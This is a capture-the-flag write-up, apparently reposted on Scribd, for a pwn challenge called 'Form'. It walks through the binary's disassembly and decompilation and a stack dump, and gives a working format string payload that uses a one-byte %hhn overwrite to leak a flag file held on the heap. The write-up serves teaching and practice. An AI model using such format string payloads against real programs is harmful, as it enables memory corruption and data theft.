Scribd Logo
Upload

Welcome to Scribd!

  • 6 views

    Description 1

    Uploaded by

    vincent.houssou

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd

    Description 1

    Uploaded by

    vincent.houssou
    6 views3 pages

    Original Title

    description1

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    6 views3 pages

    Description 1

    Uploaded by

    vincent.houssou

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    You are on page 1of 3

    Form

    Chall
    Description

    The obligatory format string challenge comes back, but with a twist.
    Me personally think this challenge is the easiest among the pwn category, because
    we don't really need a script to solve it, but yeah we have to know the trick, this
    challenge vuln was format string (actually one of my favourite pwn challenge
    because easy and fun).

    Disassembly :

    pwndbg> disass main


    Dump of assembler code for function main:
    0x0000555555555209 <+0>: endbr64
    0x000055555555520d <+4>: push rbp
    0x000055555555520e <+5>: mov rbp,rsp
    0x0000555555555211 <+8>: sub rsp,0x20
    0x0000555555555215 <+12>: mov rax,QWORD PTR fs:0x28
    0x000055555555521e <+21>: mov QWORD PTR [rbp-0x8],rax
    0x0000555555555222 <+25>: xor eax,eax
    0x0000555555555224 <+27>: mov edi,0x20
    0x0000555555555229 <+32>: call 0x555555555100 <malloc@plt>
    0x000055555555522e <+37>: mov QWORD PTR [rbp-0x18],rax
    0x0000555555555232 <+41>: mov edi,0x20
    0x0000555555555237 <+46>: call 0x555555555100 <malloc@plt>
    0x000055555555523c <+51>: mov QWORD PTR [rbp-0x20],rax
    0x0000555555555240 <+55>: mov rax,QWORD PTR [rip+0x2dd9] #
    0x555555558020 <stdin@GLIBC_2.2.5>
    0x0000555555555247 <+62>: mov esi,0x0
    0x000055555555524c <+67>: mov rdi,rax
    0x000055555555524f <+70>: call 0x5555555550d0 <setbuf@plt>
    0x0000555555555254 <+75>: mov rax,QWORD PTR [rip+0x2db5] #
    0x555555558010 <stdout@GLIBC_2.2.5>
    0x000055555555525b <+82>: mov esi,0x0
    0x0000555555555260 <+87>: mov rdi,rax
    0x0000555555555263 <+90>: call 0x5555555550d0 <setbuf@plt>
    0x0000555555555268 <+95>: lea rax,[rip+0xd95] # 0x555555556004
    0x000055555555526f <+102>: mov rsi,rax
    0x0000555555555272 <+105>: lea rax,[rip+0xd8d] # 0x555555556006
    0x0000555555555279 <+112>: mov rdi,rax
    0x000055555555527c <+115>: call 0x555555555110 <fopen@plt>
    0x0000555555555281 <+120>: mov QWORD PTR [rbp-0x10],rax
    0x0000555555555285 <+124>: mov rdx,QWORD PTR [rbp-0x10]
    0x0000555555555289 <+128>: mov rax,QWORD PTR [rbp-0x18]
    0x000055555555528d <+132>: mov esi,0x20
    0x0000555555555292 <+137>: mov rdi,rax
    0x0000555555555295 <+140>: call 0x5555555550f0 <fgets@plt>
    0x000055555555529a <+145>: mov rdx,QWORD PTR [rip+0x2d7f] #
    0x555555558020 <stdin@GLIBC_2.2.5>
    0x00005555555552a1 <+152>: mov rax,QWORD PTR [rbp-0x20]
    0x00005555555552a5 <+156>: mov esi,0x20
    0x00005555555552aa <+161>: mov rdi,rax
    0x00005555555552ad <+164>: call 0x5555555550f0 <fgets@plt>
    0x00005555555552b2 <+169>: lea rax,[rbp-0x20]
    0x00005555555552b6 <+173>: mov QWORD PTR [rbp-0x18],rax
    0x00005555555552ba <+177>: mov rax,QWORD PTR [rbp-0x18]
    0x00005555555552be <+181>: mov rdi,rax
    0x00005555555552c1 <+184>: call 0x5555555550c0 <strlen@plt>
    0x00005555555552c6 <+189>: cmp rax,0x17
    0x00005555555552ca <+193>: ja 0x5555555552dd <main+212>
    0x00005555555552cc <+195>: mov rax,QWORD PTR [rbp-0x20]
    0x00005555555552d0 <+199>: mov rdi,rax
    0x00005555555552d3 <+202>: mov eax,0x0
    0x00005555555552d8 <+207>: call 0x5555555550e0 <printf@plt>
    0x00005555555552dd <+212>: mov edi,0x0
    0x00005555555552e2 <+217>: call 0x5555555550b0 <_exit@plt>
    Or if you prefer a decompilation :

    void main(void)

    {
    size_t sVar1;
    long in_FS_OFFSET;
    char *local_28;
    char **local_20;
    FILE *local_18;
    undefined8 local_10;

    local_10 = *(undefined8 *)(in_FS_OFFSET + 0x28);


    local_20 = (char **)malloc(0x20);
    local_28 = (char *)malloc(0x20);
    setbuf(stdin,(char *)0x0);
    setbuf(stdout,(char *)0x0);
    local_18 = fopen("flag.txt","r");
    fgets((char *)local_20,0x20,local_18);
    fgets(local_28,0x20,stdin);
    local_20 = &local_28;
    sVar1 = strlen((char *)local_20);
    if (sVar1 < 0x18) {
    printf(local_28);
    }
    /* WARNING: Subroutine does not return */
    _exit(0);
    }
    Okay so the program malloc 2 chunk, first chunk will be the buffer for flag.txt,
    the second one is for our input buffer, and there's length restriction in our input
    so our payload must be small, well doesn't have to make a long one for this
    challenge.

    Exploit
    How our stack looks like after the printf :

    00:0000│ rsp 0x7fffffffda60 —▸ 0x5555555592d0 ◂— 'just checking\n'


    01:0008│ 0x7fffffffda68 —▸ 0x7fffffffda60 —▸ 0x5555555592d0 ◂— 'just checking\
    n'
    02:0010│ 0x7fffffffda70 —▸ 0x555555559300 ◂— 0xfbad2488
    03:0018│ 0x7fffffffda78 ◂— 0xa91ab74e38e68900
    04:0020│ rbp 0x7fffffffda80 ◂— 0x1
    05:0028│ 0x7fffffffda88 —▸ 0x7ffff7dd7850 (__libc_start_call_main+128) ◂— mov
    edi, eax
    06:0030│ 0x7fffffffda90 —▸ 0x7fffffffdb80 —▸ 0x7fffffffdb88 ◂— 0x38 /* '8' */
    07:0038│ 0x7fffffffda98 —▸ 0x555555555209 (main) ◂— endbr64
    as u can see there's our heap address in stack, and there's a stack address that
    point to our heap.

    So, the idea is overwrite the stack address that point to heap with just one byte,
    this one so the stack address will point to our heap that contain flag.

    01:0008│ 0x7fffffffda68 —▸ 0x7fffffffda60 —▸ 0x5555555592d0 ◂— 'just checking\


    n'
    and then we can leak the flag with %s, this address since it will be overwritten to
    flag heap

    00:0000│ rsp 0x7fffffffda60 —▸ 0x5555555592d0 ◂— 'just checking\n'


    We have to use non-positional format to execute our first idea (overwrite stack to
    point to flag heap) and we can use the $ to access the stack that have been
    overwritten.

    The payload is :

    %c%c%c%c%c%155c%hhn%6$s
    we stack up %cuntil we hit the 6th stack, the 7th format will be the payload to
    overwrite one byte %hhn this will overwrite 7th stack one byte, 155 is a padding,
    we want to overwrite the heap to 0xa0 in the end(0xa0 is 160) but since we already
    have 5 %c earlier we have to substract it with 5, and with that the overwrite will
    be saved, so when we do %6$s this will actually going to treat the 6th stack as
    string and actually leak out our flag.

    note : stack i provided earlier is stack after printf and stack i talked about is
    when we do %p since some of the earlier stack is something

    You might also like

    pFad - Phonifier reborn

    Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

    Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


    Alternative Proxies:

    Alternative Proxy

    pFad Proxy

    pFad v3 Proxy

    pFad v4 Proxy